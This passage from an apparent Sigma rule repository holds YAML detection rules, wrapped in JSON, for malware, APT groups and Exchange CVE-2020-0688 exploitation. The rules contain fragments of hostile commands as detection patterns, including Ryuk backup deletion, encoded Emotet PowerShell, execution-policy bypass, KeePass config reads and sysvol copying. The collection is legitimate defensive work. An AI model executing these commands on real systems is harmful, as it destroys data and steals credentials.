    "content": "title: Chafer Malware URL Pattern\nid: fb502828-2db0-438e-93e6-801c7548686d\nstatus: test\ndescription: Detects HTTP request used by Chafer malware to receive data from its C2.\nreferences:\n    - https://securelist.com/chafer-used-remexi-malware/89538/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-31\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/asp.asp\\?ui='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml",
    "content": "title: Potential Dridex Activity\nid: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e\nstatus: stable\ndescription: Detects potential Dridex acitvity via specific process patterns\nreferences:\n    - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3\n    - https://redcanary.com/threat-detection-report/threats/dridex/\nauthor: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-10\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.discovery\n    - attack.t1135\n    - attack.t1033\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_svchost:\n        Image|endswith: '\\svchost.exe'\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\Desktop\\'\n    filter_svchost:\n        ParentImage|startswith: 'C:\\Windows\\System32\\'\n    selection_regsvr:\n        ParentImage|endswith: '\\excel.exe'\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains:\n            - ' -s '\n            - '\\AppData\\Local\\Temp\\'\n    filter_regsvr:\n        CommandLine|contains: '.dll'\n    selection_anomaly_parent:\n        ParentImage|endswith: '\\svchost.exe'\n    selection_anomaly_child_1:\n        Image|endswith: '\\whoami.exe'\n        CommandLine|contains: ' /all'\n    selection_anomaly_child_2:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: ' view'\n    condition: (selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml",
    "content": "title: Potential Dtrack RAT Activity\nid: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4\nstatus: stable\ndescription: Detects potential Dtrack RAT activity via specific process patterns\nreferences:\n    - https://securelist.com/my-name-is-dtrack/93338/\n    - https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\n    - https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/\n    - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/\n    - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-30\nmodified: 2025-11-03\ntags:\n    - attack.impact\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ping:\n        CommandLine|re: 'ping\\s+-n.{6,64}echo EEEE\\s?>\\s?'\n    selection_ipconfig:\n        CommandLine|re: 'ipconfig\\s+/all'\n        CommandLine|contains: '\\temp\\res.ip'\n    selection_netsh:\n        CommandLine|contains|all:\n            - 'interface ip show config'\n            - '\\temp\\netsh.res'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml",
    "content": "title: Potential Emotet Activity\nid: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18\nstatus: stable\ndescription: Detects all Emotet like process executions that are not covered by the more generic rules\nreferences:\n    - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/\n    - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/\n    - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/\n    - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-09-30\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -e* PAA'\n            - 'JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ' # $env:userprofile\n            - 'QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA' # $env:userprofile\n            - 'kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA' # $env:userprofile\n            - 'IgAoACcAKgAnACkAOwAkA' # \"('*');$\n            - 'IAKAAnACoAJwApADsAJA' # \"('*');$\n            - 'iACgAJwAqACcAKQA7ACQA' # \"('*');$\n            - 'JABGAGwAeAByAGgAYwBmAGQ'\n            - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+(\n            - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+(\n            - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+(\n    filter:\n        CommandLine|contains:\n            - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ'\n            - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA'\n            - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml",
    "content": "title: Formbook Process Creation\nid: 032f5fb3-d959-41a5-9263-4173c802dc2b\nstatus: test\ndescription: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.\nreferences:\n    - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer\n    - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/\n    - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/\n    - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-09-30\nmodified: 2022-10-06\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        # Parent command line should not contain a space value\n        # This avoids false positives not caused by process injection\n        # e.g. wscript.exe /B sysmon-install.vbs\n        ParentCommandLine|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n        ParentCommandLine|endswith: '.exe'\n    selection2:\n        - CommandLine|contains|all:\n              - '/c'\n              - 'del'\n              - 'C:\\Users\\'\n              - '\\AppData\\Local\\Temp\\'\n        - CommandLine|contains|all:\n              - '/c'\n              - 'del'\n              - 'C:\\Users\\'\n              - '\\Desktop\\'\n        - CommandLine|contains|all:\n              - '/C'\n              - 'type nul >'\n              - 'C:\\Users\\'\n              - '\\Desktop\\'\n    selection3:\n        CommandLine|endswith: '.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml",
    "content": "title: LockerGoga Ransomware Activity\nid: 74db3488-fd28-480a-95aa-b7af626de068\nstatus: stable\ndescription: Detects LockerGoga ransomware activity via specific command line.\nreferences:\n    - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a\n    - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/\n    - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/\nauthor: Vasiliy Burov, oscd.community\ndate: 2020-10-18\nmodified: 2023-02-03\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-i SM-tgytutrc -s'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml",
    "content": "title: Potential QBot Activity\nid: 4fcac6eb-0287-4090-8eea-2602e4c20040\nstatus: stable\ndescription: Detects potential QBot activity by looking for process executions used previously by QBot\nreferences:\n    - https://twitter.com/killamjr/status/1179034907932315648\n    - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-01\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|endswith: '\\WinRAR.exe'\n        Image|endswith: '\\wscript.exe'\n    selection2:\n        CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '\n    selection3:\n        CommandLine|contains|all:\n            - 'regsvr32.exe'\n            - 'C:\\ProgramData'\n            - '.tmp'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml",
    "content": "title: Potential Ryuk Ransomware Activity\nid: c37510b8-2107-4b78-aa32-72f251e7a844\nrelated:\n    - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27\n      type: similar\n    - id: 0acaad27-9f02-4136-a243-c357202edd74\n      type: obsolete\nstatus: stable\ndescription: Detects Ryuk ransomware activity\nreferences:\n    - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\n    - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nauthor: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-12-16\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        CommandLine|contains|all:\n            - 'Microsoft\\Windows\\CurrentVersion\\Run'\n            - 'C:\\users\\Public\\'\n    selection_del:\n        CommandLine|contains|all:\n            - 'del /s /f /q c:\\'\n            - '\\*.bac'\n            - '\\*.bak'\n            - '\\*.bkf'\n    selection_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains|all:\n            - ' stop '\n            - ' /y'\n        CommandLine|contains:\n            - 'samss'\n            - 'audioendpointbuilder'\n            - 'unistoresvc_'\n            - 'AcrSch2Svc'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml",
    "content": "title: Potential Snatch Ransomware Activity\nid: 5325945e-f1f0-406e-97b8-65104d393fff\nstatus: stable\ndescription: Detects specific process characteristics of Snatch ransomware word document droppers\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-08-26\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - attack.t1204\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|re: 'shutdown\\s+/r /f /t 00' # Shutdown in safe mode immediately\n        - CommandLine|re: 'net\\s+stop SuperBackupMan'\n    condition: selection\nfalsepositives:\n    - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_c2_url.yml",
    "content": "title: Ursnif Malware C2 URL Pattern\nid: 932ac737-33ca-4afd-9869-0d48b391fcc9\nstatus: stable\ndescription: Detects Ursnif C2 traffic.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\nauthor: Thomas Patzke\ndate: 2019-12-19\nmodified: 2021-08-09\ntags:\n    - attack.initial-access\n    - attack.t1566.001\n    - attack.execution\n    - attack.t1204.002\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    b64encoding:\n        c-uri|contains:\n            - '_2f'\n            - '_2b'\n    urlpatterns:\n        c-uri|contains|all:\n            - '.avi'\n            - '/images/'\n    condition: b64encoding and urlpatterns\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/proxy_malware_ursnif_download_url.yml",
    "content": "title: Ursnif Malware Download URL Pattern\nid: a36ce77e-30db-4ea0-8795-644d7af5dfb4\nstatus: stable\ndescription: Detects download of Ursnif malware done by dropper documents.\nreferences:\n    - https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware\nauthor: Thomas Patzke\ndate: 2019-12-19\nmodified: 2022-08-15\nlogsource:\n    category: proxy\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\ndetection:\n    selection:\n        c-uri|contains|all:\n            - '/'\n            - '.php\\?l='\n        c-uri|endswith: '.cab'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/Malware/Ursnif/registry_add_malware_ursnif.yml",
    "content": "title: Potential Ursnif Malware Activity - Registry\nid: 21f17060-b282-4249-ade0-589ea3591558\nstatus: test\ndescription: Detects registry keys related to Ursnif malware.\nreferences:\n    - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/\n    - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/\nauthor: megan201296\ndate: 2019-02-13\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml",
    "content": "title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32\nid: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0\nstatus: test\ndescription: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local\nreferences:\n    - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg\nauthor: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-02\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'regsvr32'\n            - '\\AppData\\Local\\'\n            - '.dll'\n            - ',DllEntry'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml",
    "content": "title: APT31 Judgement Panda Activity\nid: 03e2746e-2b31-42f1-ab7a-eb39365b2422\nstatus: test\ndescription: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-21\nmodified: 2023-03-10\ntags:\n    - attack.collection\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.g0128\n    - attack.t1003.001\n    - attack.t1560.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ldifde:\n        CommandLine|contains|all:\n            - 'ldifde'\n            - '-f -n'\n            - 'eprod.ldf'\n    selection_lateral_movement:\n        CommandLine|contains|all:\n            - 'copy \\\\\\\\'\n            - 'c$'\n        CommandLine|contains:\n            - '\\aaaa\\procdump64.exe'\n            - '\\aaaa\\netsess.exe'\n            - '\\aaaa\\7za.exe'\n            - '\\c$\\aaaa\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/APT40/proxy_apt_apt40_dropbox_tool_ua.yml",
    "content": "title: APT40 Dropbox Tool User Agent\nid: 5ba715b6-71b7-44fd-8245-f66893e81b3d\nstatus: test\ndescription: Detects suspicious user agent string of APT40 Dropbox tool\nreferences:\n    - Internal research from Florian Roth\nauthor: Thomas Patzke\ndate: 2019-11-12\nmodified: 2023-05-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.exfiltration\n    - attack.t1567.002\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'\n        cs-host: 'api.dropbox.com'\n    condition: selection\nfalsepositives:\n    - Old browsers\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml",
    "content": "title: Potential Russian APT Credential Theft Activity\nid: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee\nstatus: stable\ndescription: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-21\nmodified: 2023-03-08\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - attack.t1003.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_xcopy:\n        CommandLine|contains|all:\n            - 'xcopy /S /E /C /Q /H \\\\\\\\'\n            - '\\sysvol\\'\n    selection_adexplorer:\n        CommandLine|contains|all:\n            - 'adexplorer -snapshot \"\" c:\\users\\'\n            - '\\downloads\\'\n            - '.snp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml",
    "content": "title: Potential EmpireMonkey Activity\nid: 10152a7b-b566-438f-a33c-390b607d1c8d\nstatus: test\ndescription: Detects potential EmpireMonkey APT activity\nreferences:\n    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\n    - https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-04-02\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '/e:jscript' # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine\n            - '\\Local\\Temp\\Errors.bat'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml",
    "content": "title: Equation Group DLL_U Export Function Load\nid: d465d1d8-27a2-4cca-9621-a800f37cf72e\nstatus: stable\ndescription: Detects a specific export function name used by one of EquationGroup tools\nreferences:\n    - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=\n    - https://twitter.com/cyb3rops/status/972186477512839170\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-03-04\nmodified: 2023-03-09\ntags:\n    - attack.g0020\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: '-export dll_u'\n        - CommandLine|endswith:\n              - ',dll_u'\n              - ' dll_u'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml",
    "content": "title: Mustang Panda Dropper\nid: 2d87d610-d760-45ee-a7e6-7a6f2a65de00\nstatus: test\ndescription: Detects specific process parameters as used by Mustang Panda droppers\nreferences:\n    - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/\n    - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/\n    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2019-10-30\nmodified: 2021-11-27\ntags:\n    - attack.t1587.001\n    - attack.resource-development\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        - CommandLine|contains:\n              - 'Temp\\wtask.exe /create'\n              - '%windir:~-3,1%%PUBLIC:~-9,1%'\n              - '/tn \"Security Script '\n              - '%windir:~-1,1%'\n        - CommandLine|contains|all:\n              - '/E:vbscript'\n              - 'C:\\Users\\'\n              - '.txt'\n              - '/F'\n    selection_img:\n        Image|endswith: 'Temp\\winwsh.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/README.md",
    "content": "# Operation Wocao\n\n## Summary\n\nOperation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group.\n\nYou can find more information on the threat in the following articles:\n\n- [Operation Wocao Shining a light on one of China’s hidden hacking groups](https://web.archive.org/web/20200215212348/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf)\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml",
    "content": "title: Operation Wocao Activity\nid: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab\nrelated:\n    - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d\n      type: derived\nstatus: test\ndescription: Detects activity mentioned in Operation Wocao report\nreferences:\n    - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\n    - https://twitter.com/SBousseaden/status/1207671369963646976\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019-12-20\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.discovery\n    - attack.t1012\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1027\n    - attack.execution\n    - attack.t1053.005\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'checkadmin.exe 127.0.0.1 -all'\n            - 'netsh advfirewall firewall add rule name=powershell dir=in'\n            - 'cmd /c powershell.exe -ep bypass -file c:\\s.ps1'\n            - '/tn win32times /f'\n            - 'create win32times binPath='\n            - '\\c$\\windows\\system32\\devmgr.dll'\n            - ' -exec bypass -enc JgAg'\n            - 'type *keepass\\KeePass.config.xml'\n            - 'iie.exe iie.txt'\n            - 'reg query HKEY_CURRENT_USER\\Software\\\\*\\PuTTY\\Sessions\\'\n    condition: selection\nfalsepositives:\n    - Administrators that use checkadmin.exe tool to enumerate local administrators\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml",
    "content": "title: Operation Wocao Activity - Security\nid: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d\nstatus: test\ndescription: Detects activity mentioned in Operation Wocao report\nreferences:\n    - https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\n    - https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf\n    - https://twitter.com/SBousseaden/status/1207671369963646976\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019-12-20\nmodified: 2022-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.discovery\n    - attack.t1012\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1027\n    - attack.execution\n    - attack.t1053.005\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4799\n        TargetUserName|startswith: 'Administr'\n        CallerProcessName|endswith: '\\checkadmin.exe'\n    condition: selection\nfalsepositives:\n    - Administrators that use checkadmin.exe tool to enumerate local administrators\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/web_cve_2020_0688_exchange_exploit.yml",
    "content": "title: CVE-2020-0688 Exploitation Attempt\nid: 7c64e577-d72e-4c3d-9d75-8de6d1f9146a\nstatus: test\ndescription: Detects CVE-2020-0688 Exploitation attempts\nreferences:\n    - https://github.com/Ridter/cve-2020-0688\nauthor: NVISO\ndate: 2020-02-27\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - '/ecp/default.aspx'\n            - '__VIEWSTATEGENERATOR='\n            - '__VIEWSTATE='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/web_cve_2020_0688_msexchange.yml",
    "content": "title: CVE-2020-0688 Exchange Exploitation via Web Log\nid: fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688\nreferences:\n    - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-method: 'GET'\n        cs-uri-query|contains:\n            - '/ecp/'\n            - '/owa/'\n    selection2:\n        cs-uri-query|contains: '__VIEWSTATE='\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml",
    "content": "title: CVE-2020-0688 Exploitation via Eventlog\nid: d6266bf5-935e-4661-b477-78772735a7cb\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688\nreferences:\n    - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\n    - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2020-02-29\nmodified: 2022-12-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2020-0688\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection1:\n        EventID: 4\n        Provider_Name: 'MSExchange Control Panel'\n        Level: Error\n    selection2:\n        - '&__VIEWSTATE='\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2020/Exploits/CVE-2020-10148/web_cve_2020_10148_solarwinds_exploit.yml",
